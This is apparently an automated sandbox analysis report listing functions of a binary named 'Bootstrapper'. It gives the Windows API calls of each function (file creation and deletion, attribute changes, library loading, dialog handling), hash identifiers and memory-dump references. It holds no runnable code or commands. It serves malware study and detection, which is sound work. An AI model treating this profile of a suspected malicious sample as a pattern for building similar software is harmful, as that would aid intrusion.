Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 76a99e9de7d24b64af308780e96def8f6882054d85cff11832217ada2e5b95a0
Instruction ID: 4a23b0669135f3d1a8eeb577f1899a602d399923073a5b8c7cb335e9fc808d63
Opcode Fuzzy Hash: 76a99e9de7d24b64af308780e96def8f6882054d85cff11832217ada2e5b95a0
Instruction Fuzzy Hash: 4541DE306043018FDB24DF25E58496AB7E5FBD4324F149A2DE891A32E3D770AC848E59

Function 00E01E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00E01E55

Part of subcall function 00E03BBA: __EH_prolog.LIBCMT ref: 00E03BBF

_wcslen.LIBCMT ref: 00E01EFD

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: 64e40a83c3d8f9d7b4905ecbd25dcdeefb1919ad40cdf9ca35844531d7569a5c
Instruction ID: f224e7db64ca74f9293ab96cdaea24ea3a98261b3c097611a1e29bb7d785f9bb
Opcode Fuzzy Hash: 64e40a83c3d8f9d7b4905ecbd25dcdeefb1919ad40cdf9ca35844531d7569a5c
Instruction Fuzzy Hash: F2314A71904209AFCF15DFA8C945AEEBBF6AF48304F1010ADE845B7291C7365E91CB60

Function 00E09DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00E073BC,?,?,?,00000000), ref: 00E09DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 00E09E70

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: ebef00d2a5f1ece77efa6831570799bc51dc005f33a70699aa92aeb251d3ea25
Instruction ID: 1d09516cec843a621ebaab2b56dfbffea0302eb166e0b30f6dad0b73ebed61e4
Opcode Fuzzy Hash: ebef00d2a5f1ece77efa6831570799bc51dc005f33a70699aa92aeb251d3ea25
Instruction Fuzzy Hash: 892104312882469FC714CF74C891AABBBE4AF91308F08591CF4D593183D328DD8DCB61

Function 00E0966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00E09F27,?,?,00E0771A), ref: 00E096E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00E09F27,?,?,00E0771A), ref: 00E09716

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 44f7fa20b0960b401d57de28f412d1527d3442dd7b9d876124b0b3219559e945
Instruction ID: 48d7580cd2653e6ef2bfaaecacee2642d1c15fb0cd5d87b73335126b7eeac581
Opcode Fuzzy Hash: 44f7fa20b0960b401d57de28f412d1527d3442dd7b9d876124b0b3219559e945
Instruction Fuzzy Hash: 0C21ACB1500344AEE2308E659C89BE7B7DCEB49324F101A19FAD6E25D3C7A5A8C48A71

Function 00E09E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00E09EC7
GetLastError.KERNEL32 ref: 00E09ED4

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 5413912ca5a987cf3e9be99f6fe529819294dbfe767fb9cb06f4cca06e807dc5
Instruction ID: d6336fa2687594f3bb9c0892736a4938c563d465747a145458513463bb02de20
Opcode Fuzzy Hash: 5413912ca5a987cf3e9be99f6fe529819294dbfe767fb9cb06f4cca06e807dc5
Instruction Fuzzy Hash: DA11E530600704ABD734DA39CC45BA6B7E9AB44364F505A6AE162F26D2D770EDCACB60

Function 00E28E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00E28E75

Part of subcall function 00E28E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00E2CA2C,00000000,?,00E26CBE,?,00000008,?,00E291E0,?,?,?), ref: 00E28E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00E41098,00E017CE,?,?,00000007,?,?,?,00E013D6,?,00000000), ref: 00E28EB1

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 5dd59248cc81be74c4a55ca44d66e4df6f3209084a74e98c20adcff2b197dc3a
Instruction ID: 7d19c49885f4e4d7b03f25dc191bf4a1a6c60ba54030144a3365a622094d4e0b
Opcode Fuzzy Hash: 5dd59248cc81be74c4a55ca44d66e4df6f3209084a74e98c20adcff2b197dc3a
Instruction Fuzzy Hash: 4EF0F6326031396ADB212B26BE05FAF37989F81B70F277125F814BA1A1DF70DD0081A1

Function 00E1109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00E110AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 00E110B2

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 21c2e8818e611511c76d90997c27c875d846a7db6a63ddb2cecc3079c048f7e2
Instruction ID: 676e5058b6fa73cb9fddeebd049ff59b7ac67a5daff0af5e0775ef04e2270afb
Opcode Fuzzy Hash: 21c2e8818e611511c76d90997c27c875d846a7db6a63ddb2cecc3079c048f7e2
Instruction Fuzzy Hash: C6E09232F00149AB8F0D87B59C099EB76DDEA4820831051F9E603F7101F934DEC54A60

Function 00E0A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00E0A325,?,?,?,00E0A175,?,00000001,00000000,?,?), ref: 00E0A501

Part of subcall function 00E0BB03: _wcslen.LIBCMT ref: 00E0BB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00E0A325,?,?,?,00E0A175,?,00000001,00000000,?,?), ref: 00E0A532

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 8be4d6f59674d144d572797123b88343de1a8dacbd73ef1f6cde055f97895071
Instruction ID: 0686bb6b5da50affa385db07ac19522cbbcba06fd7df4131c329976d0b16fdb2
Opcode Fuzzy Hash: 8be4d6f59674d144d572797123b88343de1a8dacbd73ef1f6cde055f97895071
Instruction Fuzzy Hash: 76F0153224024DABEB015F61DC45FDA3BBCBB0438AF488061B949E61A0DB71DAD8AA50

Function 00E0A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,00E0977F,?,?,00E095CF,?,?,?,?,?,00E32641,000000FF), ref: 00E0A1F1

Part of subcall function 00E0BB03: _wcslen.LIBCMT ref: 00E0BB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00E0977F,?,?,00E095CF,?,?,?,?,?,00E32641), ref: 00E0A21F

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: 2709cf1331fa934cd3962604e534564f5921acfc52d1cdbdadc759ac776f32d6
Instruction ID: 276ca05c81328b0d8fa98369a628458d2f0afdfaf2f3664941241155155ded69
Opcode Fuzzy Hash: 2709cf1331fa934cd3962604e534564f5921acfc52d1cdbdadc759ac776f32d6
Instruction Fuzzy Hash: 21E06D316402096BDB115B61EC45FD9379CAB183C6F484031B944E20A0EB61DAC89A50

Function 00E1AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00E32641,000000FF), ref: 00E1ACB0
CoUninitialize.COMBASE(?,?,?,?,00E32641,000000FF), ref: 00E1ACB5

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 32d70ae944bb0f0c1685f842516ae7c76fd74a174c3c7c3c0c9e211ee48b895a
Instruction ID: 3982b89dc56c314098a19bd4f49bd96cc01d836f36ae932f396b9d3b11ae4455
Opcode Fuzzy Hash: 32d70ae944bb0f0c1685f842516ae7c76fd74a174c3c7c3c0c9e211ee48b895a
Instruction Fuzzy Hash: 4EE06572604650EFC7109B59DC06F4AFBA8FB49F20F004269F416E3760CB746841CA90

Function 00E0A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,00E0A23A,?,00E0755C,?,?,?,?), ref: 00E0A254

Part of subcall function 00E0BB03: _wcslen.LIBCMT ref: 00E0BB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00E0A23A,?,00E0755C,?,?,?,?), ref: 00E0A280

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 34ca2239e02e5f03bd324222d32fe169c1ad95cfb879713779ad0a442c5d0e24
Instruction ID: 1b2e8de6a5cbd1779acc5b71dd10ff06ff1078132d3257c953c47facab3241c0
Opcode Fuzzy Hash: 34ca2239e02e5f03bd324222d32fe169c1ad95cfb879713779ad0a442c5d0e24
Instruction Fuzzy Hash: BFE092315001285BDB20ABA4CC09BD9BBA8AB083E5F044271FD44F32E0D770DE88CAE0

Function 00E1DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00E1DEEC

Part of subcall function 00E04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E040A5

SetDlgItemTextW.USER32(00000065,?), ref: 00E1DF03

Part of subcall function 00E1B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E1B579
Part of subcall function 00E1B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E1B58A
Part of subcall function 00E1B568: IsDialogMessageW.USER32(0001045E,?), ref: 00E1B59E
Part of subcall function 00E1B568: TranslateMessage.USER32(?), ref: 00E1B5AC
Part of subcall function 00E1B568: DispatchMessageW.USER32(?), ref: 00E1B5B6

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: 2172151a0b7182dd242fb9f1eea8a8cf2f0ffac42695ff0b86fcb6ec4c3455fa
Instruction ID: 9d0984247ecfdf410c6cb007e06baf1952a621bb7d723cea4a5ee78d1d329eb4
Opcode Fuzzy Hash: 2172151a0b7182dd242fb9f1eea8a8cf2f0ffac42695ff0b86fcb6ec4c3455fa
Instruction Fuzzy Hash: 89E09BF55002482ADF01A761DD06FDE37AC5B05785F040852B710F61E3D975DA558661

Function 00E1081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E10836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E0F2D8,Crypt32.dll,00000000,00E0F35C,?,?,00E0F33E,?,?,?), ref: 00E10858

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 96f017f2be42cec3bb83757e9342fc42ebeceaa2bf23a240366615b3bc95aae5
Instruction ID: eed4b9b6b8607a52e159622738f72eb3351a699daaa3c8eac9f152f31c2c4297
Opcode Fuzzy Hash: 96f017f2be42cec3bb83757e9342fc42ebeceaa2bf23a240366615b3bc95aae5
Instruction Fuzzy Hash: D8E012B65001586ADB11A7A59C49FDA7BACAF09391F0400657645F2144D674DAC48AA0

Function 00E1A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00E1A3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00E1A3E1

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: e2f68d38fbedc12acff74430c779c6b6d32d882a8a1f929cfd43a39c5ffcd55e
Instruction ID: 42c87e4a12630839bcee528b4fe03e1f8c3ef38adf308538d2c11def68ef4fab
Opcode Fuzzy Hash: e2f68d38fbedc12acff74430c779c6b6d32d882a8a1f929cfd43a39c5ffcd55e
Instruction Fuzzy Hash: 3CE0ED71505218EBCB20DF55C545BEDBBE8EB14364F10906AA856A3341E374AE44DB91

Function 00E22B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E22BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00E22BB5

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 8c17c33b430ad4e7a960384e0793186e9cc957034637b2e87ffcfa88475d5647
Instruction ID: 11f473217b058279d18cc85b84124e02758a4103096604633f36aa65519d3914
Opcode Fuzzy Hash: 8c17c33b430ad4e7a960384e0793186e9cc957034637b2e87ffcfa88475d5647
Instruction Fuzzy Hash: 45D0223419833038CC242F703C0F58933C5AE41BB97A0379EFB21B58C1EE168040A421

Function 00E012F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00E01306
ShowWindow.USER32(00000000), ref: 00E0130D

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 217cc3ffe5bf687937fa1a3c8f0857b0a4666e15b9f7fe497009440a79314460
Instruction ID: abe53324f0b02391198250500d67c02fabc22b9d9d170fe18cef90598e297499
Opcode Fuzzy Hash: 217cc3ffe5bf687937fa1a3c8f0857b0a4666e15b9f7fe497009440a79314460
Instruction Fuzzy Hash: 4CC0123245C200BECB010BB5EC09C2BBBA8ABA7312F24C908F0A5D0061C238C114DB11

Function 00E01A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00E01A09

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 6be482de4db259b8967c8f2a13eafaa883752d9aa37ffd2e7827e133599cc623
Instruction ID: a298e65dc0a4a1ad2bf27b519aacd5bfb5cb933c68e914470a5e93b19329979e
Opcode Fuzzy Hash: 6be482de4db259b8967c8f2a13eafaa883752d9aa37ffd2e7827e133599cc623
Instruction Fuzzy Hash: 56C19F30A002549FEF19DF68C898BA97BA5AF15314F0821F9EC45BF2D6DB3199C4CB61

Function 00E03BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00E03BBF

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ed70dac46dc6fb3723909c53ed54f23fb9ab5f1bcb2ce6fc21ef4dbb5b02ae23
Instruction ID: 0909dca6f904033d64e2ea29b252dce926b50c5310779512a8eba1844fdcf350
